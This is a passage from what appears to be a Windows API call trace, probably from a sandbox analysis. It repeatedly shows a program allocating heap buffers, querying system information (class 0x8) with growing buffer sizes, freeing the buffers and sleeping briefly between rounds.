ResultLength=0x19ee88*=0xc0) returned 0x0 [0149.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0149.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.456] Sleep (dwMilliseconds=0x110) [0149.776] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0149.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.778] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0149.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0149.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0149.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0149.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0149.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0149.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0149.783] Sleep (dwMilliseconds=0x110) [0150.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0150.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0150.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0150.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0150.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0150.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0150.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.116] Sleep (dwMilliseconds=0x110) [0150.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0150.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0150.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0150.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0150.555] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0150.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.556] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0150.556] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.557] Sleep (dwMilliseconds=0x110) [0150.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0150.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0150.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0150.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0150.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0150.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0150.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0150.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0150.877] Sleep (dwMilliseconds=0x110) [0151.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0151.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0151.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0151.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0151.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0151.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0151.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.192] Sleep (dwMilliseconds=0x110) [0151.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0151.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0151.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0151.493] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.496] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0151.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0151.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0151.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.501] Sleep (dwMilliseconds=0x110) [0151.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0151.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0151.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0151.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0151.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0151.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0151.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0151.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0151.864] Sleep (dwMilliseconds=0x110) [0152.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0152.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0152.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0152.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0152.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0152.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0152.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.305] Sleep (dwMilliseconds=0x110) [0152.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0152.586] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.587] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0152.587] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.588] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0152.589] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0152.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0152.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0152.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.599] Sleep (dwMilliseconds=0x110) [0152.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0152.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0152.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0152.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0152.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0152.898] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0152.899] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.899] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0152.900] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0152.900] Sleep (dwMilliseconds=0x110) [0153.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0153.426] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0153.427] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0153.428] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0153.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0153.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0153.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0153.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0153.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0153.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.432] Sleep (dwMilliseconds=0x110) [0153.743] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0153.743] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0153.744] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0153.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0153.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.746] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0153.746] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0153.747] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0153.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0153.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0153.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0153.751] Sleep (dwMilliseconds=0x110) [0154.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0154.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0154.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.054] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0154.054] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.055] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.056] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0154.056] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0154.059] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0154.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.061] Sleep (dwMilliseconds=0x110) [0154.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0154.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0154.462] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.463] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0154.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.464] 